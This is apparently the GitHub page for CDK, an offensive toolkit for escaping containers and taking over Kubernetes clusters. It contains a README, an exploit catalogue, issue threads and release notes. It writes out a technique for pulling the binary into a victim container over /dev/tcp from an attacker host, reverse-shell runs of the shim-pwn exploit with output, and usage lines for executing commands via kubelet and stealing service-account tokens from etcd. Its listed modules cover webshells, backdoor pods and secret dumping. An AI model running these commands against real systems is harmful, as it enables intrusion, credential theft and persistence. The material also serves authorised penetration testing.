CDK - Zero Dependency Container Penetration Toolkit

Overview

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

(get|post) Make request to K8s api-server. ucurl (get|post) Make request to docker unix socket. probe TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 Options: -h --help Show this help msg. -v --version Show version. ">
Usage:
  cdk evaluate [--full]
  cdk run (--list | 
            
              [
             
              ...])
  cdk auto-escape 
              
               
  cdk 
               
                 [
                
                 ...] Evaluate: cdk evaluate Gather information to find weakness inside container. cdk evaluate --full Enable file scan during information gathering. Exploit: cdk run --list List all available exploits. cdk run 
                 
                   [
                  
                   ...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki Auto Escape: cdk auto-escape 
                   
                     Escape container in different ways then let target execute 
                    
                     . Tool: vi 
                     
                       Edit files in container like "vi" command. ps Show process information like "ps -ef" command. nc [options] Create TCP tunnel. ifconfig Show network information. kcurl 
                      
                        (get|post) 
                        
                         Make request to K8s api-server. ucurl (get|post) 
                          
                           
                            Make request to docker unix socket. probe 
                             
                              
                               
                               
                                 TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 Options: -h --help Show this help msg. -v --version Show version. 
                               
                              
                             
                            
                          
                         
                       
                      
                     
                    
                   
                  
                 
                
               
              
             
            

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

Tactics Script Supported Usage/Example
Information Gathering OS Basic Info link
Information Gathering Available Capabilities link
Information Gathering Available Linux Commands link
Information Gathering Mounts link
Information Gathering Net Namespace link
Information Gathering Sensitive ENV link
Information Gathering Sensitive Process link
Information Gathering Sensitive Local Files link
Information Gathering Kube-proxy Route Localnet(CVE-2020-8558) link
Discovery K8s Api-server Info link
Discovery K8s Service-account Info link
Discovery Cloud Provider Metadata API link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run 
   
     [options]

   
Tactic Technique CDK Exploit Name Supported In Thin Doc
Escaping docker-runc CVE-2019-5736 runc-pwn
Escaping containerd-shim CVE-2020-15257 shim-pwn link
Escaping docker.sock PoC (DIND attack) docker-sock-check link
Escaping docker.sock RCE docker-sock-pwn link
Escaping Docker API(2375) RCE docker-api-pwn link
Escaping Device Mount Escaping mount-disk link
Escaping LXCFS Escaping lxcfs-rw link
Escaping Cgroups Escaping mount-cgroup link
Escaping Procfs Escaping mount-procfs link
Escaping Ptrace Escaping PoC check-ptrace link
Escaping Rewrite Cgroup(devices.allow) rewrite-cgroup-devices link
Escaping Read arbitrary file from host system (CAP_DAC_READ_SEARCH) cap-dac-read-search link
Discovery K8s Component Probe service-probe link
Discovery Dump Istio Sidecar Meta istio-check link
Discovery Dump K8s Pod Security Policies k8s-psp-dump link
Remote Control Reverse Shell reverse-shell link
Credential Access Registry BruteForce registry-brute link
Credential Access Access Key Scanning ak-leakage link
Credential Access Dump K8s Secrets k8s-secret-dump link
Credential Access Dump K8s Config k8s-configmap-dump link
Privilege Escalation K8s RBAC Bypass k8s-get-sa-token link
Persistence Deploy WebShell webshell-deploy link
Persistence Deploy Backdoor Pod k8s-backdoor-daemonset link
Persistence Deploy Shadow K8s api-server k8s-shadow-apiserver link
Persistence K8s MITM Attack (CVE-2020-8554) k8s-mitm-clusterip link
Persistence Deploy K8s CronJob k8s-cronjob link

Note about Thin: The thin release is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
Command Description Supported Usage/Example
nc TCP Tunnel link
ps Process Information link
ifconfig Network Information link
vi Edit Files link
kcurl Request to K8s api-server link
dcurl Request to Docker HTTP API link
ucurl Request to Docker Unix Socket link
rcurl Request to Docker Registry API
probe IP/Port Scanning link

Release Document

If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the Release Document.

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting any issue, ideas or PRs, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

png

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

WHC 2021 (补天白帽大会)

KCON 2021 Arsenal

Kubernetes community Days 2021

Comments
  • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492

    co-operate with PR #40.

    Use reexec technique to let a multi-thread program (such as this golang program) runs in a different new namespace.

    Why reexec?

    unshare() is not possible to use safely in multi-thread program, especially current circumstance. Check comments in code for more details.

    Signed-off-by: kmahyyg [email protected]

    opened by kmahyyg 13
  • Add CAP_DAC_READ_SEARCH escape

    Add CAP_DAC_READ_SEARCH escape

    Hi team! First of all thanks for the project! I'd like to contribute escape via CAP_DAC_READ_SEARCH capability that allows arbitrary file read.

    You'll find documentation to this escape in comments to this PR because I can't edit project Wiki directly.


    Nikita Stupin Advanced Software Technology Lab Huawei

    opened by nikitastupin 6
  • expoilt模块下的docker_runc.go的两个问题

    expoilt模块下的docker_runc.go的两个问题

    1. ./cdk run runc-pwn "" 命令执行后,在进程中匹配runc会匹配到运行该条命令的进程。所以总会先匹配到self进程,建议把命令改一下,比如 ./cdk run rc-pwn image

    image

    1. 读取了/proc下的pids后,下图中只把pids遍历一遍就退出了,应该持续监听,直到宿主机再次运行docker exec就可以找到runc了。 image 建议在外面再加一个for循环
    opened by lqqqc 3
  • 在复现CVE-2020-14257遇到问题

    在复现CVE-2020-14257遇到问题

    在复现CVE-2020-15257时遇到问题

    我现在想要复现CDK利用漏洞CVE-2020-15257,我的docker版本是

    $docker version
    Client:
     Version:      18.03.1-ce
     API version:  1.37
     Go version:   go1.9.5
     Git commit:   9ee9f40
     Built:        Thu Apr 26 07:17:20 2018
     OS/Arch:      linux/amd64
     Experimental: false
     Orchestrator: swarm
    
    Server:
     Engine:
      Version:      18.03.1-ce
      API version:  1.37 (minimum version 1.12)
      Go version:   go1.9.5
      Git commit:   9ee9f40
      Built:        Thu Apr 26 07:15:30 2018
      OS/Arch:      linux/amd64
      Experimental: false
    

    API版本是1.3.7,是存在漏洞的版本。

    执行以下命令:

    docker run -itd --name 14257 --net=host ubuntu /bin/bash
    docker cp cdk_linux_amd64 15257:/tmp
    

    然后在容器中:

    ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    

    现在想向我的攻击机上反弹一个宿主机的shell,但是程序报错,具体信息如下:

    [email protected]:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    

    看起来像是在$PATH目录下没有找到runc,docker我是通过官网提供的方式安装的,没有额外安装过runc,没有切换过容器的底层运行时。容器能够正常运行说明runc肯定是在系统上的,但是利用失败了。

    附加信息

    1、 cdk evaluate --full 的返回结果是?【在host内执行】

    $ ./cdk_linux_amd64 evaluate --full
    
    [Information Gathering - System Info]
    2021/06/24 19:45:23 current dir: /home/xsw/Desktop
    2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
    2021/06/24 19:45:23 hostname: ubuntu
    2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic
    
    [Information Gathering - Services]
    2021/06/24 19:45:23 sensitive env found:
    	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
    2021/06/24 19:45:23 service found in process:
    	1873	1814	ibus-engine-sim
    2021/06/24 19:45:23 service found in process:
    	8638	1	dockerd
    2021/06/24 19:45:23 service found in process:
    	8644	8638	docker-containe
    2021/06/24 19:45:23 service found in process:
    	9976	8644	docker-containe
    2021/06/24 19:45:23 service found in process:
    	10501	10470	docker
    2021/06/24 19:45:23 service found in process:
    	12100	11244	docker
    2021/06/24 19:45:23 service found in process:
    	12106	8644	docker-containe
    
    [Information Gathering - Commands and Capabilities]
    2021/06/24 19:45:23 available commands:
    	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
    2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
    	CapInh:	0000000000000000
    	CapPrm:	0000000000000000
    	CapEff:	0000000000000000
    	CapBnd:	0000003fffffffff
    	CapAmb:	0000000000000000
    	Cap decode: 0x0000000000000000 = 
    [*] Maybe you can exploit the Capabilities below:
    
    [Information Gathering - Mounts]
    Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered
    
    [Information Gathering - Net Namespace]
    	host unix-socket found, seems container started with --net=host privilege.
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
    	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
    
    [Information Gathering - Sysctl Variables]
    2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0
    
    [Discovery - K8s API Server]
    2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
    err found while searching local K8s apiserver addr.:
    err: cannot find kubernetes api host in ENV
    	api-server forbids anonymous request.
    	response:
    
    [Discovery - K8s Service Account]
    load K8s service account token error.:
    open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
    
    [Discovery - Cloud Provider Metadata API]
    2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
    2021/06/24 19:45:25 failed to dial Azure API.
    2021/06/24 19:45:25 failed to dial Google Cloud API.
    2021/06/24 19:45:26 failed to dial Tencent Cloud API.
    2021/06/24 19:45:27 failed to dial OpenStack API.
    2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
    2021/06/24 19:45:28 failed to dial ucloud API.
    
    [Information Gathering - Sensitive Files]
    	/.bashrc - /etc/skel/.bashrc
    	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
    	/.bash_history - /home/xsw/.bash_history
    	/.bashrc - /home/xsw/.bashrc
    	.git/ - /home/xsw/metarget/.git/HEAD
    	.git/ - /home/xsw/metarget/.git/branches
    	.git/ - /home/xsw/metarget/.git/config
    	.git/ - /home/xsw/metarget/.git/description
    	.git/ - /home/xsw/metarget/.git/hooks
    	.git/ - /home/xsw/metarget/.git/index
    	.git/ - /home/xsw/metarget/.git/info
    	.git/ - /home/xsw/metarget/.git/logs
    	.git/ - /home/xsw/metarget/.git/objects
    	.git/ - /home/xsw/metarget/.git/packed-refs
    	.git/ - /home/xsw/metarget/.git/refs
    	/docker.sock - /lib/systemd/system/docker.socket
    	/docker.sock - /run/docker.sock
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
    	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
    
    [Information Gathering - ASLR]
    2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
    2021/06/24 19:45:49 ASLR is enabled.
    
    [Information Gathering - Cgroups]
    2021/06/24 19:45:49 /proc/1/cgroup file content:
    	11:pids:/init.scope
    	10:cpuset:/
    	9:hugetlb:/
    	8:memory:/init.scope
    	7:devices:/init.scope
    	6:freezer:/
    	5:cpu,cpuacct:/init.scope
    	4:perf_event:/
    	3:net_cls,net_prio:/
    	2:blkio:/init.scope
    	1:name=systemd:/init.scope
    

    2、完整错误信息

    [email protected]:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
    2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
    2021/06/25 03:01:57 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/25 03:01:57 exploit failed.
    
    question 
    opened by duowen1 3
  • add kubelet exec

    add kubelet exec

    Exploit: kubelet-exec

    Use the default '10250' port 'kubelet' service to list pods running in the cluster.
    By default, unauthorized access is supported. The token can be entered optionally.

    利用默认10250端口kubelet服务列举集群中运行的pods,支持指定pods执行系统命令并回显。
    默认支持未授权访问利用,token可选择性填写。

    Usage

    ./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>
    

    Example

    ./cdk run kubelet-exec list http://172.16.61.10:10250
    ./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"
    
    opened by 404tk 2
  • Implement mount-cgroup in Golang style

    Implement mount-cgroup in Golang style

    feat(exp/mount_cgroup.go): completely fix #35 in golang-style

    This implemented mount-cgroup exploit totally in Golang.

    Detailed information:

    • Change whole "create-mount-write" process using Golang native Unix API.
    • To avoid conflict, increase length of random string from 3 to 4. Tasks sub-cgroup are also in the same kind of random name.
    • Read mounted filesystem information from /proc/self/mountinfo, instead of /etc/mtab .
    • Due to the limitation of exec.Command, output redirect is implemented in another way: manually get pid and write to cgroups.procs

    Further enhancement:

    • To read the container filesystem path on the host, implement to read superBlockOptions of MountInfo.
    • To implement CVE-2022-0492 in this PR further, I modified EscapeCgroup function, so that it can be re-used for other subsystems.

    Chores:

    • go mod tidy
    • Fix Typo
    • Run a much quicker random string generator
    1b94046 (HEAD -> main, origin/main, origin/HEAD) feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    043d6b6 feat(util/cgroup.go): add superBlockOptions when parsing /proc/self/mountinfo
    4c640ae fix(util/cgroup.go): typo: marjor -> major
    60b44e5 fix(exp/mount-cgroup): fix #35 in shell-style in a simple way
    ecfadba optimize(exp/mount-cgroup): update build constraint, cgroup is linux only
    ef056df optimize(util/common.go): Quicker Random String Generator
    
    opened by kmahyyg 2
  • Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Add check for `CAP_SYS_MODULE` and `CAP_DAC_READ_SEARCH`

    Hi team,

    1. In this PR I've added explicit check for CAP_SYS_MODULE (and CAP_DAC_READ_SERACH as well) at evaluate step. This way it's more clear for end-user what escape techniques he / she can apply after evaluate step is completed.
    2. I suggest to refactor check_ptrace.go in similar way because technically it's just evaluating that CAP_SYS_PTRACE exists and not actually escaping. So I suppose it should belong to evaluate step rather than escape step.
    3. The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:
      1. To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
      2. To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.
    4. What do you think about point (3)? Do you have any ideas on how to integrate CAP_SYS_MODULE escape to CDK?

    Nikita Stupin Advanced Software Technology Lab Huawei

    opened by nikitastupin 2
  • add lxcfs-rw escape

    add lxcfs-rw escape

    添加当容器内 lxcfs 可写当情况下的利用 image

    output:

    /tmp # ./cdk run lxcfs-rw
    2021/01/27 16:30:17 found pod devices.allow path: /kubepods/burstable/pod3453dde3-3ede-11eb-bff3-5254005e6516/8ca73287248fc9f72f6d502db9406edeca5acacd85b466b68d7ad4810e3bf7e5
    2021/01/27 16:30:17 found rw lxcfs mountpoint: /data/monitor/lxcfs
    2021/01/27 16:30:17 found host blockDeviceId Marjor: 253 Minor: 1
    2021/01/27 16:30:17 set all block device accessible success.
    2021/01/27 16:30:17 devices.allow content: a *:* rwm
    2021/01/27 16:30:17 exploit success, run "debugfs -w host_dev".
    

    利用效果: image

    opened by yeahx 2
  • shim-pwn执行失败

    shim-pwn执行失败

    尝试了一下shim-pwn,在容器里执行shim-pwd的exp,报了下面的错误:

    debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
    2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
    2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
    

    docker版本:

    Client:
     Version:           18.06.1-ce
     API version:       1.38
     Go version:        go1.10.3
     Git commit:        e68fc7a
     Built:             Tue Aug 21 17:23:18 2018
     OS/Arch:           linux/amd64
     Experimental:      false
    
    Server:
     Engine:
      Version:          18.06.1-ce
      API version:      1.38 (minimum version 1.12)
      Go version:       go1.10.3
      Git commit:       e68fc7a
      Built:            Tue Aug 21 17:22:21 2018
      OS/Arch:          linux/amd64
      Experimental:     false
    
    opened by forkingna 2
  • add etcd get k8s token

    add etcd get k8s token

    Exploit: etcd-get-k8s-token

    List key and value pairs under the /registry/secrets/kube-system/ in etcd service, regular extract plaintext service-account-token, requests the default port 6443 'K8s API-server' service to verify the validity of the token and take over the cluster.

    遍历etcd/registry/secrets/kube-system/前缀下的key、value对,正则提取明文service-account-token,对默认6443端口K8s api-server服务进行请求,验证token有效性,可进一步接管集群。

    Usage

    ./cdk run etcd-get-k8s-token (anonymous|default) <endpoint> <cert> <cert_key> <ca>
    

    Example

    ./cdk run etcd-get-k8s-token anonymous http://172.16.61.10:2379
    ./cdk run etcd-get-k8s-token default
    
    opened by 404tk 1
  • Exploit-docker_runc.go的两个问题

    Exploit-docker_runc.go的两个问题

    1. 代码48行判断是否是文件夹,if !util.IsDir(f.Name())应改为if !util.IsDir("/proc/" + f.Name()) 截图

    2. 代码93行,Desc()有误 截图 (1) 应是./cdk run runc-pwn <shell-cmd>,还有其他好几个模块都有这个问题。

    opened by lqqqc 1
  • 可以更新CVE-2021-22555到CDK中?

    可以更新CVE-2021-22555到CDK中?

    opened by OFalwl 1
  • [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    [Exploit] Implement actual CAP_SYS_MODULE escape in CDK

    From: @nikitastupin in #20

    The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:

    • To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
    • To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.

    Great thanks to Nikita.

    enhancement 
    opened by neargle 4
  • [doc] document about thin version and upx version

    [doc] document about thin version and upx version

    需要一个解释说明各 release binary 区别的文档(备忘,近期编写)。

    In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in source code and cut a few exploits to make the binary lighter, just a 2MB file, but contains 90% of CDK functions, you may also pick up useful exploits in our CDK source code to build your own lightweight binary.

    image

    documentation 
    opened by neargle 0
Releases(v1.4.1)
  • v1.4.1(Sep 19, 2022)

    Release Date: 2022-09-19

    :scroll: Changelog

    :mag: About Evaluate

    • Feat(evaluate): support check setuid files in path (#67)
    • More colorful in Evaluate
    image

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55|cdk_darwin_amd64 d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198|cdk_linux_386 2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7|cdk_linux_386_thin 6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7|cdk_linux_386_thin_upx 54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56|cdk_linux_386_upx 5b313e80767783165c9f99079a6210582b5f57fe4c3f34ab2c5d27e6b1a09695|cdk_linux_amd64 762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121|cdk_linux_amd64_thin b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e|cdk_linux_amd64_thin_upx c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384|cdk_linux_amd64_upx 6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3|cdk_linux_arm b6ef9851d887120994e19521814b994f750f0eac77ddc2ae60efd75ad085b02f|cdk_linux_arm64 de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e|cdk_linux_arm64_thin|

    What's Changed

    • Better eva - feat(evaluate): support check setuid files in path by @neargle in https://github.com/cdk-team/CDK/pull/67

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.4.0...v1.4.1

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.07 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.89 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.37 MB)
    cdk_linux_amd64_thin(5.79 MB)
    cdk_linux_amd64_thin_upx(2.25 MB)
    cdk_linux_amd64_upx(4.03 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.4.0(Sep 4, 2022)

    Release Date: 2022-09-04

    :scroll: Changelog

    :bomb: Exploits

    • Perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup exploit
    • Fix(exp): function undefined in macos
    • Feat(exp): support Exploit lxcfs-rw with cgroup release_agent

    :mag: About Evaluate

    • Feat(evaluate): output all mount info and more colorfu (#64)
    • Perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup exploit

    :sparkles: Others

    • Feat(evaluate): output all mount info and more colorfu (#64)
    • Perf(exp) #62: add recommend message for lxcfs-rw and lxcfs-rw-cgroup
    • Feat(exp): support Exploit lxcfs-rw with cgroup release_agent
    • Test(fix): fix import circle in TestParseCDKMain

    What's Changed

    • feat(exp): support Exploit lxcfs-rw with cgroup release_agent by @lockedtang in https://github.com/cdk-team/CDK/pull/61
    • perf(exp): add recommend message for lxcfs-rw and lxcfs-rw-cgroup… by @neargle in https://github.com/cdk-team/CDK/pull/62
    • feat(evaluate): output all mount info and more colorfu by @neargle in https://github.com/cdk-team/CDK/pull/64

    New Contributors

    • @lockedtang made their first contribution in https://github.com/cdk-team/CDK/pull/61

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.3.0...v1.4.0

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |dbbe29d4095a98dbfc4e2ef1a26e0696f75930a04a274a2a207c0bd0296b7a24|cdk_darwin_amd64 b75d4f2cb82be9e774f78020bb86d8df9a8eeb6ceac18b823c4c6459a3ca7faf|cdk_linux_386 d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d|cdk_linux_386_thin 1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6|cdk_linux_386_thin_upx c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d|cdk_linux_386_upx 954c9e0a1f8f731d410d27e525225760bf46f9df26d7fa63fac9cf848c1fea97|cdk_linux_amd64 28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be|cdk_linux_amd64_thin 37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113|cdk_linux_amd64_thin_upx e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a|cdk_linux_amd64_upx 0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff|cdk_linux_arm a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498|cdk_linux_arm64 7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.07 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.89 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.36 MB)
    cdk_linux_amd64_thin(5.78 MB)
    cdk_linux_amd64_thin_upx(2.25 MB)
    cdk_linux_amd64_upx(4.18 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.3.0(Jul 10, 2022)

    Release Date: 2022-07-10

    🔮 Support for some function on the kubelet. Waiting for July 18?

    :scroll: Changelog

    :bomb: Exploits

    • Test(main function): add unit test for ParseCDKMain
    • Feat(exp): support "Exploit container escape with kubelet log access & /var/log mount"
    • Feat(exp) (#55): Exploit a kubelet endpoint, default 10250

    :toolbox: Tools

    • Test(main function): add unit test for ParseCDKMain

    :sparkles: Others

    • Test(github action): add go test
    • Fix(network): support getgateway in linux container
    • Docs(readme): add Quick Start
    • Feat(network): get gateway in pods
    • Feat(exp) (#55): Exploit a kubelet endpoint, default 10250

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0|cdk_darwin_amd64 c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9|cdk_linux_386 5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d|cdk_linux_386_thin f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845|cdk_linux_386_thin_upx ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079|cdk_linux_386_upx ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5|cdk_linux_amd64 3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3|cdk_linux_amd64_thin 0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2|cdk_linux_amd64_thin_upx 9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8|cdk_linux_amd64_upx 99a0e78b14a0147999489e76b275e0a4503b03ed682cb382338a19472123b74d|cdk_linux_arm 023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570|cdk_linux_arm64 